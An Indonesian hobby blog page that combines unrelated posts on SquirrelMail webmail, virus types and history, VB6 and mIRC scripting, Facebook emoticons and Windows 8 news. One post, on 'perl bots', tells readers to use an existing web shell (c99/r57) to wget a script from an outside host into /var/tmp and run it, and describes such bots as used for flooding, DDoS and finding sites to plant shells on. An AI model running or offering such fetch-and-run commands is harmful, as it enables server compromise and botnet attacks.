AnasKi Blog's

Salam Pembuka

Welcome to AnasKi CreW !


Trima kasih Telah Mengunjungi Blog saya dan jangan lupa tinggalkan komentar :D
Tampilkan postingan dengan label windows. Tampilkan semua postingan
Tampilkan postingan dengan label windows. Tampilkan semua postingan
  1. Login Webmail/Webserver

  2. Login Webmail, Webserver
    1. Masukan Alamat Email
    2. Masukan Password Anda
    3. Kemudian Tekan Tombol Login

  3. Pilih WebMail Server

  4. Webmail, SquirrelMail, Atmail, Horde, roundcube
    Setelah Login akan terlihat seperti gambar di atas,, disini saya akan memilih Webmail SquirrelMail karna dsni saya akan membahas tentang SquirrelMail :D,, anda jg bsa menggunakan webmail server yg lain,,
  5. Menukar Bahasa

  6. Menukar Bahasa, setting bahasa, Webmail, SquirrelMail
    Tekan Option, lalu akan muncul sperti kotak di bawah ini,,,

    Menukar Bahasa, setting bahasa, Webmail, SquirrelMail

    Setelah Itu Pilih Display Preferences,, muncul kotak dialog seperti di bawah ini

    Menukar Bahasa, setting bahasa, Webmail, SquirrelMail

    1. Merubah Thema
    2. Merubah Bentuk Tulisan
    3. Merubah Bahasa
    Silahkan Pilih Nomor 3,, di ganti dengan Bahasa Indonesia,, pilih aja yang mana anda suka ;D,, setelah selesai tekan tombol paling bawah yang tulisannya submit dlm bahasa inggris atau kirim dalam bahasa indonesia

  7. Mengirim pesan
  8. mengirim pesan, kirim pesan, Webmail, SquirrelMail
    pilih tulisan , lalu akan muncul kotak seperti di bawah ini

    mengirim pesan, kirim pesan, Webmail, SquirrelMail
    1. Alamat Email Yang akan di kirim
    2. CC : Carbon Copy di gunakan untuk mengirim ke bnyak orang sama fungsinya dengan tag,, BCC sama fungsinya dg CC
    3. Subject merupakan judul pesan yang akan di kirim
    4. Prioritas digunakan untuk Status Pesan, Contoh : Biasa dan pesan ini tidak terlalu penting
    5. Ini adalah Tempat Untuk Isi Pesan
    6. Lampiran Ibarat Mengirim Barang di Post,, lampiran di gunakan untuk mengirim suatu file ke email
    7. Setelah Selesai Lalu Kirim
cukup sekian artikelnya kali ini klau ada pertanyaan silahkan di komentar,,,,, :D
Untuk lebih mempertajam pengetahuan kita tentang virus, Aku akan coba 
memberikan penjelasan tentang jenis-jenis virus yang sering berkeliaran
di dunia cyber.

1.Virus Makro
Jenis Virus ini pasti sudah sangat sering kita dengar.Virus ini ditulis
dengan bahasa pemrograman dari suatu aplikasi bukan dengan bahasa
pemrograman dari suatu Operating System. Virus ini dapat berjalan apabila
aplikasi pembentuknya dapat berjalan dengan baik, maksudnya jika pada
komputer mac dapat menjalankan aplikasi word maka virus ini bekerja pada
komputer bersistem operasi Mac.
contoh virus:

-variant W97M, misal W97M.Panther
panjang 1234 bytes,
akanmenginfeksi NORMAL.DOT dan menginfeksi dokumen apabila dibuka.
-WM.Twno.A;TW
panjang 41984 bytes,
akan menginfeksi Dokumen Ms.Word yang menggunakan bahasa makro, biasanya
berekstensi *.DOT dan *.DOC
-dll

2.Virus Boot Sector
Virus Boot sector ini sudah umum sekali menyebar.Virus ini dalam menggandakan
dirinya akan memindahkan atau menggantikan boot sector asli dengan program
booting virus. Sehingga saat terjadi booting maka virus akan di load kememori
dan selanjutnya virus akan mempunyai kemampuan mengendalikan hardware standar
(ex::monitor, printer dsb) dan dari memori ini pula virus akan menyebar
eseluruh drive yang ada dan terhubung kekomputer (ex: floopy, drive lain
selain drive c).
contoh virus :

-varian virus wyx
ex: wyx.C(B) menginfeksi boot record dan floopy ;
panjang :520 bytes;
karakteristik : memory resident dan terenkripsi)
-varian V-sign :
menginfeksi : Master boot record ;
panjang 520 bytes;
karakteristik: menetap di memori (memory resident),terenkripsi, dan polymorphic)
-Stoned.june 4th/ bloody!:
menginfeksi : Master boot record dan floopy;
panjang 520 bytes;
karakteristik: menetap di memori (memory resident), terenkripsi dan menampilkan
pesan"Bloody!june 4th 1989" setelah komputer melakukan booting sebanyak 128 kali

3.Stealth Virus
Virus ini akan menguasai tabel tabel interupt pada DOS yang sering kita kenal
dengan "Interrupt interceptor" . virus ini berkemampuan untuk mengendalikan
instruksi instruksi level DOS dan biasanya mereka tersembunyi sesuai namanya
baik secara penuh ataupun ukurannya .
contoh virus:
-Yankee.XPEH.4928,
menginfeksi file *.COM dan *.EXE ;
panjang 4298 bytes;
karakteristik: menetap di memori, ukurantersembunyi, memiliki pemicu
-WXYC (yang termasuk kategori boot record pun karena masuk kategri stealth
dimasukkan pula disini), menginfeksi floopy an motherboot record;
panjang 520 bytes;
menetap di memori; ukuran dan virus tersembunyi.
-Vmem(s):
menginfeksi file file *.EXE, *.SYS, dan *.COM ;
panjang fie 3275 bytes;
karakteristik:menetap di memori, ukuran tersembunyi, di enkripsi.
-dll

4.Polymorphic Virus
Virus ini Dirancang buat mengecoh program antivirus,artinya virus ini selalu
berusaha agar tidak dikenali oleh antivirus dengan cara selalu merubah rubah
strukturnya setiap kali selesai menginfeksi file/program lain.

contoh virus:

-Necropolis A/B,
menginfeksi file *.EXE dan *.COM;
panjang file 1963 bytes;
karakteristik: menetap di memori, ukuran dan virus tesembunyi,terenkripsi dan
dapat berubah ubah struktur
-Nightfall,
menginfeksi file *.EXE;
panjang file 4554 bytes;
karakteristik : menetap di memori, ukuran dan virus tesembunyi,memiliki pemicu,
terenkripsidan dapat berubah-ubah struktur
-dll


5.Virus File/Program
Virus ini menginfeksi file file yang dapat dieksekusi langsung dari sistem operasi,
baik itu file application (*.EXE), maupun *.COm biasanya juga hasil infeksi
dari virus ini dapat diketahui dengan berubahnya ukuran file yang diserangnya.


6.Multi Partition Virus
Virus ini merupakan gabungan dariVirus Boot sector dan Virus file: artinya
pekerjaan yang dilakukan berakibat dua, yaitu dia dapat menginfeksi file-
file *.EXE dan juga menginfeksi Boot Sector.
1949, John Von Neuman, menggungkapkan   " teori self altering automata "
yang merupakan hasil riset dari para ahli matematika.

1960, lab BELL (AT&T), para ahli di lab BELL (AT&T) mencoba-coba teori
yang diungkapkan oleh john v neuman, mereka bermain-main dengan teori
tersebut untuk suatu jenis permainan/game. Para ahli tersebut membuat
program yang dapat memperbanyak dirinya dan dapat menghancurkan program
buatan lawan.Program yang mampu bertahan dan menghancurkan semua program
lain, maka akan dianggap sebagai pemenangnya. Permainan ini akhirnya
menjadi permainan favorit ditiap-tiap lab komputer.semakin lama mereka
pun sadar dan mulai mewaspadai permainan ini dikarenakan program yang
diciptakan makin lama makin berbahaya, sehingga mereka melakukan
pengawasan dan pengamanan yang ketat.

1980, program tersebut yang akhirnya dikenal dengan nama "virus" ini
berhasil menyebar diluar lingkungan laboratorium, dan mulai beredar di
dunia cyber.

1980, mulailah dikenal virus-virus yang menyebar di dunia cyber.
Suatu Hari terjadilah percakapan antara linus.t dan b.gates mengenai siapakah
pembuat Nessus yang merupakan salah satu security scanner yang cukup ternama, dan sebelum
b.gates memutuskan untuk membelinya maka dia bertanya kepada linus tentang apakah arti
nessus itu sebenarnya, karena gates merasa takut jika ketidaktahuannya tentang arti
nessus akan menggagalkan rencananya untuk membeli nessus itu.

gates: nus, nessus itu apa artinya yah?
linus: waduh, coba dunk digunakan itu msn search beta muw itu
gates: hmm, (gates terlihat berfikir dengan malasnya untuk memanfaatkan salah satu andalannya MSN Search beta)
linus: bagaimana?
gates: apa dork yang biasa digunakan?
linus: MSN search beta punya dork (*nonsense)

Setelah sekian lama mencari dengan berbagai kata kunci di search engine keluarannya
akhirnya dengan tersenyum gates berkata,

gates: setelah dicari-cari maka aku simpulkan itu berasal dari yunani, merupakan nama
dari salah satu Centaur yang di bunuh oleh hercules, dan kemudian darahnya membunuh hercules

linus: halah, masih kurang canggih search enginemu, kurang tepat, itu dari bahasa jawa lho :D
gates: lah kok bisa?
linus: iyah pada saat Renaud Deraison melakukan pentest di sebuah perusahaan, dan menemukan
banyak vulnerabilities dengan tools yang ia buat, maka IT security perusahaan tersebut
akhirnya marah2, dan renaud pun habis dimarahi karena Manajer tersebut malu bukan kepalang.
gates: Lalu apa hubungannya ? (seraya dengan cepat mencoba memeriksanya di search engine miliknya)
linus: untuk mengenang hal itu Renaud pun memberi nama tools yang baru ia ciptakan dengan nama nessus
gates: halah kok bisa (sambil membuka tab IE 7 miliknya untuk menuliskan penjelasn linus ini di blognya)
linus: karena nessu ... artinya adalah marah dalam bahasa jawa, dan marah-marah berarti nessu-nessu
karena itu dia beri nama nessus (s; untuk jamak)
gates: wow, amazing.. what is your search engine linus? *seraya memposting tulisannya
linus: damn, ternyata kau memang benar pencipta "wind blows", i was kidding dude!
gates: #@^$$#&*#^!^!

Semua cerita diatas adalah bohong, semua karakter adalah palsu, kesamaan nama adalah
bukan kebetulan :P
Splash Screen adalah Tampilan Menu pertama ketika akan loading seperti tampilan starup Smadav.

Cara membuatnya adalah sebagai berikut:

  1. klik kanan menu project, kemudian pilih add [gambar 1.1 ], kemudian
    ambil Form [ gambar 1.2]


  2. Splash Screen, Script VB6, Splash



  3. Kemudian pada menu add From [ gambar 2 ] pilih splash screen [ gambar 2.3 ] kemudian open [ gambar 2.4 ]

  4. Splash Screen, Script VB6, Splash

  5. Klik kanan menu Project [ gambar 3.5 ], setelah itu pilih project propertis [ gambar 3.6 ]

  6. Splash Screen, Script VB6, Splash

  7. Pada project propertis pilih startup object [ gambar 4.7 ], kemudian pilih frmSplash [ gambar 4.8

  8. Splash Screen, Script VB6, Splash

  9. kemudian ambil timer [ gambar 5.9 ], setelah itu klik kiri2x pada menu timer [ gambar timer ] setelah itu masukan script


  10. Splash Screen, Script VB6, Splash
    Splash Screen, Script VB6, Splash
    Private Sub Timer1_Timer()
    Select Case Y
    Case 0
    Label2 = "|||||||||||||||||||||||||||||"
    End Select
    S = Len(Label2)
    Label1 = Left(Label2, p)
    p = p + 1

    If p = S Then
    Unload Me
    Menu.Show
    End If
    End Sub

Ada yang kelupaan pada script di atas tulisan [ label2 ] silahkan buat pada menu toolbox pilih yang ada gambar [A] hitam setelah itu selesai silahkan di coba :D

Sekian Tutorialnya silahkan tinggalkan komentar :D
Bot perl adalah sejenis sejenis bot yang bisa konek dengan menggunakan perl. sedangkan perl adalah sejenis pemprograman bahasa. untuk info perl silahkan google :D

Sebenarnya cara membuat bot perl itu gampang cara nya sebagai berikut :

  1. pertama anda masuk ke shell / c99 / r57 anda yang ada menggunakan bahasa pemprograman perl
  2. cukup Lakukan perintah di bawah ini :
cd /var/tmp;wget http://xXxX.com/XxXx/scan.txt
cd /var/tmp;chmod 755 scan.txt
cd /var/tmp;perl scan.txt
Script bot perl ada 2 macam :
  1. di kenal dengan nama bot perl yaitu bot yang digunakan untuk memenuhkan channel dan digunakan untuk flood, ddos, tsunami dll
  2. bot scan yang di gunakan untuk mencari celah web untuk di jadikan target/shell
ini script bot scan
Portable Executable format (singkat:PE) adalah kode objek dan DLL, digunakan dalam 32-bit dan versi 64-bit dari sistem operasi Windows. Istilah "portable" mengacu pada fleksibilitas format dalam berbagai lingkungan operasi arsitektur sistem perangkat lunak. Portable Executable format adalah struktur data yang dilengkapi semua informasi yang diperlukan untuk loader OS Windows untuk mengelola kode dieksekusi dibungkus dalam satu/beberapa file.

Apakah Portable Executable format yang sering digunakan? Untuk system operasi windows yang cukup sering terkenal adalah diantaranya: EXE, COM, BAT, SCR, DLL, SYS, dan baru-baru ini telah ditemukan bug pada Microsoft yaitu Excute file melalui LNK dan PIF

Setelah sobat tau apa-apa file yang menyebabkan program terexcute/jalan ke System Windows sobat sekarang kita membuat rule atau aturan, misal Flaskdisk sobat berada pada Drive F:\ maka sobat bisa membuat rule seperti ini:

* F:\*.EXE
* F:\*.COM
* F:\*.BAT
* F:\*.SCR
* F:\*.DLL
* F:\*.SYS
* F:\*.LNK
* F:\*.PIF

Aturan atau rule telah kita buat gimana caranya agar file tersebut tidak bisa jalan jika berada didalam Flashdisk.
big font tulisan besar
ini contoh nya
Anda cuma cukup memasukan script di bawah ini ke dalam Romote Mirc
;----------------------------------
; BIG FONT
;----------------------------------

alias cmt {
if ($bigtext.unsupp($1-)) {
echo -ac info * Characters not supported by Big Text present in your message: $bigtext.unsupp($1-)
return
}
var %lia, %lib, %lic, %lid, %lie, %i 1, %text $strip($1-, bur), %colregex /^(\d\d?(?:,\d\d?)?)/

var %regex = /(?<= $+ $chr(3) $+ [0-9]| $+ $chr(3) $+ [0-9][0-9]) $+ $chr(44) $+ \d\d?/g, %res, %dummy = $regsub(%text, %regex, $null, %text) while (%i <= $len(%text)) { if ($mid(%text, %i, 1) == $chr(3)) { var %lia $+(%lia, $chr(3)), %lib $+(%lib, $chr(3)), %lic $+(%lic, $chr(3)), %lid $+(%lid, $chr(3)), %lie $+(%lie, $chr(3)) if ($mid(%text, $calc(%i + 1), 1) != $chr(32)) && ($regex(mtcol, $mid(%text, $calc(%i + 1), $mid(%text, $calc(%i + 1), 0)), %colregex)) { var %m $regml(mtcol, 1) var %lia %lia $+ %m, %lib %lib $+ %m, %lic %lic $+ %m, %lid %lid $+ %m, %lie %lie $+ %m inc %i $len(%m) } } else { tokenize 32 $bigtext.char($mid(%text, %i, 1)) var %lia $+(%lia, $1), %lib $+(%lib, $2), %lic $+(%lic, $3), %lid $+(%lid, $4), %lie $+(%lie, $5) ; if ($bigtext.kern($mid(%text, %i, 2))) { var %lia $+(%lia, .), %lib $+(%lib, .), %lic $+(%lic, .), %lid $+(%lid, .), %lie $+(%lie, .) ; } } inc %i } say $bigtext.format(%lia) say $bigtext.format(%lib) say $bigtext.format(%lic) say $bigtext.format(%lid) say $bigtext.format(%lie) } ; You may customize this alias however you want to. ; It is Big Text's font, used above. ; The return value consists of dots and X's, to denote ; unlit and lit points in the font, respectively; ; there are 5 tokens of the same length, each ; corresponding to a line in the 5-line output. ; Note how the . and X's look like the characters; ; you can use this to your advantage! alias -l bigtext.char { if ($1 === $chr(32)) || ($1 === $null) return $& ... $& ... $& ... $& ... $& ... if ($1 === $chr(160)) return $& ..... $& ..... $& ..... $& ..... $& ..... elseif ($1 == 0) return $& 12.XXXX.$& 12XX..XX$& 12XX.XXX$& 12XXX.XX$& 12.XXXX. elseif ($1 == 1) return $& .XXXX $& XX.XX $& ...XX $& ...XX $& ...XX elseif ($1 == 2) return $& XXXXX. $& ....XX $& ..XX.. $& XX.... $& XXXXXX elseif ($1 == 3) return $& XXXXX. $& ....XX $& .XXXX. $& ....XX $& XXXXX. elseif ($1 == 4) return $& .....XXX. $& ...XX.XX. $& .XX...XX. $& XXXXXXXXX $& ......XX. elseif ($1 == 5) return $& XXXXX $& XX... $& XXXX. $& ...XX $& XXXX. elseif ($1 == 6) return $& .XXXX. $& XX.... $& XXXXX. $& XX..XX $& .XXXX. elseif ($1 == 7) return $& XXXXXX $& ...XX. $& ..XX.. $& .XX... $& XX.... elseif ($1 == 8) return $& .XXXX. $& XX..XX $& .XXXX. $& XX..XX $& .XXXX. elseif ($1 == 9) return $& .XXXX. $& XX..XX $& .XXXXX $& ....XX $& .XXXX. elseif ($1 == A) return $& .XXXX. $& XX..XX $& XXXXXX $& XX..XX $& XX..XX elseif ($1 == B) return $& XXXXX. $& XX..XX $& XXXXX. $& XX..XX $& XXXXX. elseif ($1 == C) return $& .XXXX. $& XX..XX $& XX.... $& XX..XX $& .XXXX. elseif ($1 == D) return $& XXXX.. $& XX.XX. $& XX..XX $& XX..XX $& XXXXX. elseif ($1 == E) return $& XXXXX $& XX... $& XXXX. $& XX... $& XXXXX elseif ($1 == F) return $& XXXXX $& XX... $& XXXX. $& XX... $& XX... elseif ($1 == G) return $& .XXXX. $& XX.... $& XX.XXX $& XX..XX $& .XXXXX elseif ($1 == H) return $& XX...XX $& XX...XX $& XXXXXXX $& XX...XX $& XX...XX elseif ($1 == I) return $& XXXX $& .XX. $& .XX. $& .XX. $& XXXX elseif ($1 == J) return $& ....XX $& ....XX $& ....XX $& XX..XX $& .XXXX. elseif ($1 == K) return $& XX..XX $& XX.XX. $& XXXX.. $& XX.XX. $& XX..XX elseif ($1 == L) return $& XX... $& XX... $& XX... $& XX... $& XXXXX elseif ($1 == M) return $& XX....XX $& XXX..XXX $& XXXXXXXX $& XX.XX.XX $& XX....XX elseif ($1 == N) return $& XX..XX $& XXX.XX $& XXXXXX $& XX.XXX $& XX..XX elseif ($1 == O) return $& .XXXX. $& XX..XX $& XX..XX $& XX..XX $& .XXXX. elseif ($1 == P) return $& XXXXX. $& XX..XX $& XXXXX. $& XX.... $& XX.... elseif ($1 == Q) return $& .XXXX.. $& XX..XX. $& XX..XX. $& XX..XX. $& .XXXXXX elseif ($1 == R) return $& XXXXX. $& XX..XX $& XXXXX. $& XX..XX $& XX..XX elseif ($1 == S) return $& .XXXX. $& XX.... $& .XXXX. $& ....XX $& XXXXX. elseif ($1 == T) return $& XXXXXX $& ..XX.. $& ..XX.. $& ..XX.. $& ..XX.. elseif ($1 == U) return $& XX..XX $& XX..XX $& XX..XX $& XX..XX $& .XXXX. elseif ($1 == V) return $& XX....XX $& XX....XX $& .XX..XX. $& ..XXXX.. $& ...XX... elseif ($1 == W) return $& XX...XX $& XX...XX $& XX.X.XX $& XXXXXXX $& .XX.XX. elseif ($1 == X) return $& XX...XX $& .XX.XX. $& ..XXX.. $& .XX.XX. $& XX...XX elseif ($1 == Y) return $& XX..XX $& XX..XX $& .XXXX. $& ..XX.. $& ..XX.. elseif ($1 == Z) return $& XXXXXX $& ...XX. $& ..XX.. $& .XX... $& XXXXXX elseif ($1 == $chr(35)) return $& .XX..XX. $& XXXXXXXX $& .XX..XX. $& XXXXXXXX $& .XX..XX. elseif ($1 == ') return $& .XX $& XX. $& ... $& ... $& ... elseif ($1 == ") return $& XX..XX $& XX..XX $& ...... $& ...... $& ...... elseif ($1 == +) return $& ...... $& ..XX.. $& XXXXXX $& ..XX.. $& ...... elseif ($1 == =) return $& ...... $& XXXXXX $& ...... $& XXXXXX $& ...... elseif ($1 == -) return $& ...... $& ...... $& XXXXXX $& ...... $& ...... elseif ($1 == _) return $& ...... $& ...... $& ...... $& ...... $& XXXXXX elseif ($1 == ¯) return $& XXXXXX $& ...... $& ...... $& ...... $& ...... elseif ($1 == °) return $& .XXX. $& XX.XX $& .XXX. $& ..... $& ..... elseif ($1 == :) return $& .. $& XX $& .. $& XX $& .. elseif ($1 == !) return $& XX $& XX $& XX $& .. $& XX elseif ($1 == ?) return $& XXX. $& ..XX $& .XX. $& .... $& .XX. elseif ($1 == .) return $& .. $& .. $& .. $& .. $& XX elseif ($1 == /) return $& ....XX $& ...XX. $& ..XX.. $& .XX... $& XX.... elseif ($1 == \) return $& XX.... $& .XX... $& ..XX.. $& ...XX. $& ....XX elseif ($1 == $chr(40)) return $& ....X $& ..X.. $& X.... $& ..X.. $& ....X elseif ($1 == $chr(41)) return $& X.... $& ..X.. $& ....X $& ..X.. $& X.... elseif ($1 == $chr(37)) return $& XX..XX $& ...XX. $& ..XX.. $& .XX... $& XX..XX elseif ($1 == [) return $& XXXXX $& XX... $& XX... $& XX... $& XXXXX elseif ($1 == ]) return $& XXXXX $& ...XX $& ...XX $& ...XX $& XXXXX elseif ($1 == |) return $& .XX. $& .XX. $& .XX. $& .XX. $& .XX. elseif ($1 == <) return $& ....XX $& ..XX.. $& XX.... $& ..XX.. $& ....XX elseif ($1 == >) return $&
XX.... $&
..XX.. $&
....XX $&
..XX.. $&
XX....
elseif ($1 == ¸) return $&
.... $&
.... $&
.XX. $&
..XX $&
XXX.
elseif ($1 == ,) return $&
... $&
... $&
XXX $&
.XX $&
XX.
}


; Returns all unsupported characters within a Big Text message
; Supported characters are a-z, space, digits, #'"+=?:!?./\()%-[]<>|?,
alias bigtext.unsupp {
var %res, %dummy = $regsub($1-, /[]a-z 0-9# $+ $chr(44) $+ '+=?:!?./\\()%[|<>_?"?-]/igS, $null, %res)
return %res
}

; Returns $true if a space should be added between two characters,
; or $false if not.
; Note: This is here only for aesthetic purposes. :)
alias bigtext.kern {
var %res $true
if ($regex($1-, /^(.|[_GDSQL-]T|[TPFVY7/"]J|T\.|L[1Y\\"]|[LTK<[]-|-[]>%\\]|S1|T4|\?\.|\.\?|[467L\\]?|?[J/]|L'|\/\/|\\\\|?J|[_?]?|[?T_]_|>\.|\.<)$/i)) %res = $false return %res } ; Takes an input string of the form: ; .XX..XX....XX.XX.XXXXX ; And formats it for display. alias bigtext.format { var %res, %i 1, %previous 0, %current, %curcolor, %colregex /^(\d\d?(?:,\d\d?)?)/ while (%i <= $len($1-)) { if ($mid($1-, %i, 1) == $chr(3)) { if ($regex(mtcol, $mid($1-, $calc(%i + 1), $mid($1-, $calc(%i + 1), 0)), %colregex)) { if ($gettok($regml(mtcol, 1), 1, 44) != %curcolor) { %curcolor = $gettok($regml(mtcol, 1), 1, 44) if (%i != 1) && ($mid($1-, $calc(%i - 1), 1) == X) %res = %res $+ $chr(15) } inc %i $len($regml(mtcol, 1)) } elseif (%curcolor) { %curcolor = if (%i != 1) && ($mid($1-, $calc(%i - 1), 1) == X) %res = %res $+ $chr(15) } } else { %current = $iif($mid($1-, %i, 1) == ., 0, 1) if (%previous != %current) { %previous = %current if (%curcolor) { if (%current) %res = %res $+ $chr(3) $+ %curcolor $+ , $+ %curcolor else %res = %res $+ $chr(3) } else %res = %res $+ $chr(22) } %res = %res $+ $chr(160) } inc %i } return %res } menu channel { Big Font: { set %q.t $$?="What to Say?:" | if (%q.t != $null) { cmt %q.t } | unset %q.t } }
Putty adalah klien SSH dan telnet, yang dikembangkan awalnya oleh Simon Tatham untuk platform Windows. Putty adalah perangkat lunak sumber terbuka yang tersedia dengan kode sumber dan dikembangkan dan didukung oleh sekelompok relawan.

Kamu Bisa Download putty disni
Buat facebook-er yang hobi chat (chating) di facebook. Tentu akan lebih seru kalau saat chat menggunakan kode smiley dan chat emoticons.

Adapun cara untuk membuat kode smiley di facebook, sebagai berikut :

- Aktifkan NumLock pada keyboard... anda terlebih dahulu.

- Tekan tombol Alt di ikuti angka berikut ini :

1 - ☺
2 - ☻
3 - ♥
4 - ♦
5 - ♣
6 - ♠
7 - •
8 - ◘
9 - ○
10 - ◙
11 - ♂
12 - ♀
13 - ♪
14 - ♫
15 - ☼
16 - ►
17 - ◄
18 - ↕
19 - ‼
20 - ¶
21 - §
22 - ▬
23 - ↨
24 - ↑
25 - ↓
26 - →
27 - ←
28 -∟
29 - ↔
30 -▲
31 -▼
32 -
33 - !
34 - "
35 - #
36 - $
37 - %
38 - &
39 - '
40 - (
41 - )
42 -*
43 - +
44 - ,
45 - -
46 - .
47 - /
48 - 0
49 - 1
50 - ┬

Dan lain lain
- Contoh : Jika kita menekan tombol Alt+14, nanti akan keluar simbol ♫ . (Pastikan NumLock selalu aktif)

Selamat Berchat Facebook :D
PTC adalah singkatan dari Pay To Click, yang secara sederhana berarti kita akan dibayar dari setiap kali meng-klik sebuah iklan selama jangka waktu yang terbatas



Earn up to $0.02 (2 cents) per click.
Earn up to $0.01 (1 cent) for every ad your referrals click.
Instant Payment / Receiving System.





Earn up to $0.02 (2 cents) per click.
Earn up to $0.01 (1 cent) for every ad your referrals click.
Instant Payment / Receiving System.
Maaf sebelum nya saya tidak bisa menulis kata2 apapun memang sih artikel ini saya translate dari bahaa inggris ke indonesia :D ini kata dari situs itu

Window 8 adalah lanjutan dari window 7 yang telah banyak di rilis sekarang ini
Kami telah menetapkan pertama kami dari Windows 8 Wallpaper! Windows 8 Transformation Pack adalah dari tim yang sama yang mengumpulkan beberapa Wallpaper awal Windows 7.


Windows 8 Transformation Pack


Dalam paket ini adalah Windows 8 Wallpaper dan 8 Windows Login Screen latar belakang.

Windows Edisi 8 Professional RC1_xbuild7.0.1128

Perubahan Windows Vista ke dalam Windows Anda 8 Pro.

Seperti yang Anda semua tahu Windows 8 belum dibuat.

Tapi Windows 8 menyediakan banyak fitur baru bersama dengan antarmuka baru dirancang. Hal ini terlihat sangat mirip dengan Windows Vista dan Windows 7 (Great kombinasi) tetapi ada banyak perubahan seperti taskbar GUI didesain ulang, Explorer, layar boot baru dan layar login, dll

Link Tutorial [link]

Link Themes DOWNLOAD [link]

Link Logon Screen DOWNLOAD [link]

Link ViGlance updated button skin DOWNLOAD [link]

Link System Tray icon, Tclock Lite & Watermark DOWNLOAD [link]

Link Wallpapers DOWNLOAD [link]
Microsoft cukup ketat ketika datang ke rilis versi berikutnya dari Windows, yang untuk saat ini dikenal sebagai Windows 8. Banyak ahli memperkirakan bahwa Windows 8 akan dirilis dalam waktu tiga tahun setelah peluncuran Windows 7, yang akan menyarankan rilis pada kuartal terakhir 2012 di pasar yang paling penting.

Sebuah posting berita di Microsoft Belanda telah sengaja membocorkan tanggal rilis, atau akan kita katakan periode, Windows 8. Artikel, yang sebagian besar berurusan dengan ulang tahun pertama dari Windows 7, menatap masa depan Windows di paragraf terakhir.

Harap dicatat bahwa ini adalah terjemahan dari teks dari Belanda ke Bahasa Indonesia menggunakan Google Translate:

Penghapusan secara bertahap dari Windows XP, Microsoft hampir selesai. Pada bulan Juli 2010, dukungan untuk Windows XP dengan Service Pack 2 berhenti. Hari ini Microsoft akan menghentikan penjualan Windows XP ke produsen PC dan penjualan aftermarket dari Windows Vista. Untuk Windows 7, Microsoft Service Pack 1. Service pack ini masih dalam tahap pengujian dan diharapkan pada semester pertama tahun depan tersedia. Update pertama dari Windows 7 adalah versi baru dari Windows Live Essentials (explore.live.com) menjadi tersedia pada pertengahan Juni. Selanjutnya, Microsoft tentu saja versi berikutnya dari Windows. Tapi itu akan memakan waktu sekitar dua tahun sebelum "Windows 8 'di pasar


Kalimat terakhir adalah penting. Pos, diterbitkan pada 22 Oktober 2010 mengungkapkan bahwa itu akan memakan waktu dua tahun sebelum Windows 8 akan beredar , yang akan jatuh langsung sejalan dengan prediksi bahwa Windows 8 akan dirilis pada akhir 2012. (Via)

Jika semua hal berjalan sesuai rencana, kita mungkin akan melihat mirip dengan Windows 7 jadwal pembangunan, dengan rilis 8 beta Windows pada bulan Januari 2012, Windows 8 kandidat rilis pada bulan April 2012 dan Windows 8 rilis RTM pada bulan Juli.
Beberapa Aplikasi Silahkan Download :

1. 7zip.exe
2. Filezila.exe
3. putty.exe
4. winscp.exe